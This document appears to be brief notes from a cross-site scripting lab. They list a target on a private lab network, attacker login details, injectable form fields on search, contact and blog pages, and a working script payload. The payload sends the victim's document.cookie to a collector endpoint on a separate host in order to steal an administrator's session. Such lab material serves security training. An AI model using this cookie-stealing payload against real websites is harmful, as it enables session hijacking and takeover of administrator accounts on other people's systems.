http://**192.168.99.10/** hosted address
username: attacker
password: attacker
http://192.168.99.11/get.php receives stolen cookies
✔️ steal the administrator's cookies via XSS
✔️ access admin page: admin.php
1️⃣ Find all the XSS points
2️⃣ Steal admin session cookies
/search.php
search
/contact.php
name
subject
/blog.php
object
comment
<script>
var i = new Image();
i.src="<http://192.168.99.11/get.php?cookies=>"+document.cookie;
</script>